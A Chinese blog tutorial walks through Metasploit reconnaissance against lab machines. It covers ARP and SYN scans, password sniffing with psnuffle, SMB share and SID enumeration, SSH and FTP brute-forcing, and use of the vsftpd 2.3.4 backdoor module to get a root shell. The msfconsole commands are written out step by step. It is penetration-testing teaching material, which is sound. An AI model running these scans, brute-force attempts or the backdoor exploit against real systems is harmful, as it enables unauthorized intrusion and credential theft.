Metasploit渗透测试之信息收集

多协议主机信息收集方法
原创 已于 2024-12-17 16:06:04 修改 · 1k 阅读 · 13 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web

于 2024-12-17 15:30:01 首次发布

基于 tcp协议收集主机信息

使用 Metasploit 中的 nmap和 arp _ sweep 收集主机信息

  • Metasploit中也有 nmap工具 (注: 192.168.1.180是Metasploitable2-Linux靶机)

        root@xuegod53:~# msfconsole

        msf5 > db _ nmap - sV 192.168.1.180

  • ARP扫描

        msf5 > use auxiliary/ scanner/ discovery/ arp _ sweep

  • 查看一下模块需要配置哪些参数

        msf5 auxiliary(scanner/ discovery/ arp _ sweep) > show options

  • 配置 RHOSTS (扫描的目标网络) 即可

        msf5 auxiliary(scanner/ discovery/ arp _ sweep) > set RHOSTS 192.168.1.0/24

  • SHOST和SMAC是伪造源IP和 MAC地址使用的。配置线程数

        msf5 auxiliary(scanner/ discovery/ arp _ sweep) > set THREADS 30
        msf5 auxiliary(scanner/ discovery/ arp _ sweep) > run

        msf5 auxiliary(scanner/ discovery/ arp _ sweep) > back   #退出一下

使用半连接方式扫描 TCP 端口

msf5 > search portscan

msf5 > use auxiliary/scanner/portscan/syn
查看配置项
msf5 auxiliary(scanner/portscan/syn) > show options
设置扫描的目标
msf5 auxiliary(scanner/portscan/syn) > set RHOSTS 192.168.1.180
设置端口范围使用逗号隔开,例如 22-25,80,110-900
msf5 auxiliary(scanner/portscan/syn) > set PORTS 80
设置线程数
msf5 auxiliary(scanner/portscan/syn) > set THREADS 20
msf5 auxiliary(scanner/portscan/syn) > run

使用 auxiliary/sniffer 下的 psnuffle 模块进行密码嗅探

实验拓扑图:
msf5 > search psnuffle
msf5 > use auxiliary/sniffer/psnuffle
查看 psnuffle 的模块作用:
msf5 auxiliary(sniffer/psnuffle) > info
root@xuegod53:~# apt install lftp -y      #安装 lftp 命令
root@xuegod53:~# lftp -u msfadmin 192.168.1.180
密码:msfadmin
连接成功后,进行下数据交互,查看 ftp 目录下的文件
lftp msfadmin@192.168.1.180:~> ls
回到 MSF 终端可以看到用户名密码信息已经被获取。
嗅探完成后记得把后台任务关闭
msf5 auxiliary(sniffer/psnuffle) > jobs #查看后台运行的任务
msf5 auxiliary(sniffer/psnuffle) > kill 0 #kill job ID,关闭 job

基于 SNMP 协议收集主机信息

我们使用 root 用户

先到 Metasploitable2-Linux 主机上修改一下 SNMP 服务,因为默认服务是 不 对外开放的。

msfadmin@metasploitable:~# vim /etc/default/snmpd
改第 11 行
SNMPDOPTS='-Lsd -Lf /dev/null -u snmp -I -smux -p /var/run/snmpd.pid 127.0.0.1'
为:
SNMPDOPTS='-Lsd -Lf /dev/null -u snmp -I -smux -p /var/run/snmpd.pid 0.0.0.0'
保存退出
重启 SNMP 服务
msfadmin@metasploitable:~$ sudo /etc/init.d/snmpd restart
确认服务监听正常
msfadmin@metasploitable:~$ netstat -antup | grep 161
实战-使用 snmp_enum 模块通过 snmp 协议扫描目标服务器信息

基于 SMB 协议收集信息

使用 smb_version 基于 SMB 协议扫描版本号

msf5 > use auxiliary/scanner/smb/smb_version
设置扫描目标,注意多个目标使用逗号+空格隔开
msf5 auxiliary(scanner/smb/smb_version) > show options
#设置
msf5 auxiliary(scanner/smb/smb_version) > set RHOSTS 192.168.1.56,
192.168.1.180
注: 192.168.1.56 后面的逗号和 192.168.1.180 之间是有空格的
msf5 auxiliary(scanner/smb/smb_version) > run

使用 smb_enumshares 基于 SMB 协议扫共享文件(账号、密码)

我们到 Windows 中启用一下共享服务。
新建文件夹 xuegod 并进入该文件夹。
枚举共享
msf5 > use auxiliary/scanner/smb/smb_enumshares
msf5 auxiliary(scanner/smb/smb_enumshares) > show options
扫描 192.168.1.53 到 192.168.1.60 的机器
msf5 auxiliary(scanner/smb/smb_enumshares) > set RHOSTS 192.168.1.56
如果你不配置用户,就扫描不到信息。配置一下用户信息,我这里用户是默认的管理员用户,密码没 有 设置。
'

使用 smb_lookupsid 扫描系统用户信息(SID 枚举)

我们在 Win7 上新建一个 xuegod 用户。密码也是 123456。
右键计算机→管理→本地用户和组→用户 ,在空白处,右击新建一个用户
注:SID 是 Windows 中每一个用户的 ID,更改用户名 SID 也是不会改变的。
msf5 > use auxiliary/scanner/smb/smb_lookupsid
msf5 auxiliary(scanner/smb/smb_lookupsid) > show options
msf5 auxiliary(scanner/smb/smb_lookupsid) > set RHOSTS 192.168.1.56
msf5 auxiliary(scanner/smb/smb_lookupsid) > set SMBUser administrator
msf5 auxiliary(scanner/smb/smb_lookupsid) > set SMBPass 123456
msf5 auxiliary(scanner/smb/smb_lookupsid) > run

基于 SSH 协议收集信息

查看 ssh 服务的版本信息

msf5 > use auxiliary/scanner/ssh/ssh_version
msf5 auxiliary(scanner/ssh/ssh_version) > show options
msf5 auxiliary(scanner/ssh/ssh_version) > set RHOSTS 192.168.1.180
msf5 auxiliary(scanner/ssh/ssh_version) > run

对 SSH 暴力破解

设置字典文件默认的字典文件是不满足实际需求的后期我们使用更强大的字典文件。
msf5 auxiliary(scanner/ssh/ssh_login) > set USERPASS_FILE /usr/share/metasploit
framework/data/wordlists/root_userpass.txt
因为字典文件中不包含我们的用户密码信息我们把自己的密码信息手动加入进去以便展示效果新开一个 终端窗口
root@xuegod53:~# echo "msfadmin msfadmin" >> /usr/share/metasploit
framework/data/wordlists/root_userpass.txt
回到 MSF 终端
msf5 auxiliary(scanner/ssh/ssh_login) > run
因为我们是在文件的最后添加的,所以前面的都是失败的操作。

基于 FTP 协议收集信息

查看 ftp 服务的版本信息

加载 ftp 服务版本扫描模块

msf5 > use auxiliary/scanner/ftp/ftp_version
查看设置参数
msf5 auxiliary(scanner/ftp/ftp_version) > show options
设置目标 IP,可以设置多个
msf5 auxiliary(scanner/ftp/ftp_version) > set RHOSTS 192.168.1.180
执行扫描,输入 exploit 或 run
msf5 auxiliary(scanner/ftp/ftp_version) > run
扫描出结果是:vsFTPd 2.3.4
msf5 auxiliary(scanner/ftp/ftp_version) > back
扫描出 ftp 服务的版本号,我们可以尝试搜索版本号,看看有没有可以利用的模块
msf5 > search 2.3.4
或者搜索 vsftpd
msf5 > search vsftpd
我们发现存在一个 exploit 模块,而且这个版本的 ftp 服务存在一个后门
我们尝试利用下这个模块
msf5 > use exploit/unix/ftp/vsftpd_234_backdoor
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > show options
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 192.168.1.180
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > run
拿到了 shell,而且是 root 权限,我们尝试执行下命令
执行 id 命令, 查看当前用户
执行 ifconfig 命令,查看 IP 地址

ftp匿名登录扫描

msf5 > use auxiliary/scanner/ftp/anonymous
msf5 auxiliary(scanner/ftp/anonymous) > show options
msf5 auxiliary(scanner/ftp/anonymous) > set RHOSTS 192.168.1.180
msf5 auxiliary(scanner/ftp/anonymous) > run

ftp 暴力破解

msf5 > use auxiliary/scanner/ftp/ftp_login
msf5 auxiliary(scanner/ftp/ftp_login) > show options
msf5 auxiliary(scanner/ftp/ftp_login) > set RHOSTS 192.168.1.180
设置字典文件默认的字典文件是不满足实际需求的后期我们使用更强大的字典文件。
msf5 auxiliary(scanner/ssh/ssh_login) > set USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/root_userpass.txt
回到 MSF 终端
msf5 auxiliary(scanner/ftp/ftp_login) > run
因为我们是在文件的最后添加的,所以前面的都是失败的操作。
总结:
基于 tcp 协议收集主机信息
基于 SNMP 协议收集主机信息
基于 SMB 协议收集信息
基于 SSH 协议收集信息
基于 FTP 协议收集信息
【一】Metasploit(MSF)之信息收集
guanjian_ci的博客
05-30 919
前言:本文仅作学术分享,目的在于维护网络安全,如果非法使用,一切法律后果自行承担! 1、Metasploit简单介绍 2、Metasploit常用术语 关系描述:Shellcode包含了payload、而监听器配合payload,这样才能建立一个完整的连接!! 3、Metasploit启动 kali linux自带Metasploit,输入启动命令:msfconsole 4、Metasploit几大模块介绍 注意:我的Metasploit版本是msf6。 0、exploit
网络安全:Metasploit 渗透测试信息收集
weixin_46035615的博客
04-19 3270
网络安全:Metasploit 渗透测试信息收集 1 基于 TCP 协议收集主机信息 2 基于 SNMP 协议收集主机信息 3 基于 SMB 协议收集信息 4 基于 SSH 协议收集信息 5 基于 FTP 协议收集信息
Metasploit学习笔记之——情报搜集
JochenZou的专栏
09-30 4710
1.情报搜集 1.1外围信息搜索 1.1.1通过DNS和IP地址挖掘目标网络信息 (1)whois域名注册信息查询(BT5、kali专有):root@kali:~# whois testfire.net  s (2)nslookup与dig域名查询(查询域名对应的IP地址):msf > nslookup
Metasploit信息收集
Web安全工具库
08-11 739
毕业了,想留的人没能留住,想要的生活也没有如约而至,也就这样了。。。 ---- 网易云热评 一、MSF更新 1、apt-get update 2、apt-get install metasploit-framework 二、敏感目录收集 1、查找dir_scanner模块 search dir_scanner type:auxiliary 2、选择扫描用到的辅助模块 use 0或者use auxiliary/scanner/http/dir_scanner 3、查看需要设置的参.
metasploit---信息收集
孤的博客
11-01 597
域名信息收集 msf > whois 域名 用辅助模块收集邮件 msf > use auxiliary/gather/search_email_collector msf auxiliary(gather/search_email_collector) > show options Module options (auxiliary/gather/search_email_...
08、Metasploit渗透测试信息收集
山兔的博客
09-05 1125
一个好的渗透测试,是要把信息收集给完全了,不要他给你一个主站,你就光打一个主站,这样就没得玩了,这么多的协议收集,不指定开那个,万一开了ssh协议,我们可以利用一下,有没有相关漏洞,比如开了snmp或者开了TCP,都可以去扫一扫,尽可能详细的信息收集,才能有利于你们接下来漏洞利用,如何去发现这个漏洞,有版本出现那个漏洞、验证漏洞,扫描漏洞,然后利用这个漏洞去攻击,处理后事。像这种大规模的暴力破解,早就被发现了,这要是一个服务器,被这样强行的打、测试,早就开始拉警报了,封IP都是小事,开始溯源了。
Metasploit渗透测试信息收集(二)
qq_63831588的博客
06-13 814
基于SNMP协议收集主机信息,基于SMB协议收集信息
Metasploit渗透测试指南_渗透测试_metasploit_
10-04
**Metasploit渗透测试指南** 渗透测试是一种授权的安全测试,旨在发现并评估计算机网络和系统的弱点,以增强安全防御。Metasploit是一款广泛使用的开源工具,专为安全专业人士设计,用于执行这种测试。本指南将深入...
Metasploit渗透测试信息收集(三)
最新发布
qq_63831588的博客
06-14 1106
基于ssh协议收集信息,ssh暴力破解,基于ftp协议收集信息,ftp匿名登陆,ftp暴力破解
Metasploit渗透测试指南 修订版
09-21
Metasploit渗透测试指南 修订版》是一本深度探讨Metasploit框架的权威书籍,旨在帮助初学者和专业人士理解并掌握网络安全领域的渗透测试技术。Metasploit是一款强大的开源安全工具,广泛应用于安全评估、漏洞验证...
Metasploit技术-01-信息收集
Xor0ne
07-18 971
MS渗透的大致步骤如下: 扫描目标机系统,寻找可用漏洞 选择配置一个漏洞利用模块 选择并配置一个攻击载荷模块 选择一个编码技术,用来绕过杀毒软件的查杀 渗透攻击 1.主机扫描 目的: 目标机器的IP、可用服务、开放端口等等 1.1、被动信息收集 模块显示: search + XXX gather模块 search gather 1.1.1、DNS扫描 DNS扫描和枚举模块,可用于从给定的DNS服务器收集有关域名的信息,执行各种DNS查询(如域传送、反向查询、SRV记录等) 1、进入模块:use aux
metasploit 情报搜集技术【3】服务扫描、查点、口令猜解与嗅探
BigYellow
11-09 1585
1、服务扫描服务查点:利用搜集到的开放的端口运行的服务进行深入挖掘 metasploit中有许多相关工具,大部分都在Scanner辅助模块 常以[service_name]_version(用以遍历主机,确定服务版本) [service_name]_login(进行口令探测攻击)命名 可输入 search name:_version查看所有服务查点模块网络服务扫描 ①telent服
Metasploit渗透测试信息收集(一)
qq_63831588的博客
06-13 620
基于tcp协议收集主机信息,密码嗅探,半连接方式扫描tcp端口
MSF路由转发
baidu_38844729的博客
11-29 1062
前言 已经拿下一台内网服务器的控制权,想要用msf去访问内网资源,可以在msf中添加路由 msf访问内网实现的条件: 1.获得一个msf的session会话 2.在msf中添加内网网段的路由 步骤 1.msf反弹shell,获取session会话,具体过程可以参考:https://blog.csdn.net/baidu_38844729/article/details/109940441,我已经获得了会话, 2.添加路由 route add 0.0.0.0 0.0.0.0 session ID #分别为
Metasploit 内网渗透三 —— Metasploit 渗透测试信息搜集1 ——基于TCP协议收集主机信息(主机信息、端口状态、密码嗅探)
天下著书立传者,皆为我师
05-03 1603
实验内网渗透环境Metasploitable2-linux:靶机 192.168.234.8kali-debian:攻击机 192.168.234.141win7 虚拟机:靶机 192.168.234.158在此声明文章仅供相互学习参考,严禁利用于违法犯忌的事,任何事故自行承担!!
利用Metasploit进行信息收集
qq_44821149的博客
01-23 2318
2.1 基于SNMP协议收集主机信息: 2.1.1 我们使用 root 用户先到 Metasploitable2-Linux 主机上修改一下 SNMP 服务,因为默认服务是 不对外开放的。 2.1.2 我们先打开我们的snmp的配置文件 2.1.3 然后我们修改一下第11行 我们把 SNMPDOPTS=’-Lsd -Lf /dev/null -u snmp -I -smux -p /var/run/snmpd.pid 127.0.0.1’ 改为: SNMPDOPTS=’-Lsd -Lf /dev/nul
利用metasploit进行信息收集
MyDriverC
12-17 1468
http://netsecurity.51cto.com/art/201405/439124.htm 在进行信息收集的时候,我们既要全面详细的获取目标的信息,又要尽量隐藏自己不被发现。Metasploit作为一个非常全面的渗透工具,用来收集信息也非常好用。本文会详细的介绍如何利用Metasploit进行信息收集信息收集分为主动和被动两种方式。 被动信息收集
Metasploit 学习笔记
热门推荐
不急不躁
07-11 2万+
在Kali中使用Metasploit,需要先开启PostgreSQL数据库服务和Metasploit服务 然后就可以完整的利用 msf 数据库查询 exploit 和记录service postgresql start service metasploit start如果不想每次开机都这样,还可以配置随系统启动update-rc.d postgresql enable update-rc.d me
metasploit信息收集
weixin_34290390的博客
04-01 193
2019独角兽企业重金招聘Python工程师标准>>> ...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

韦煜欣

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值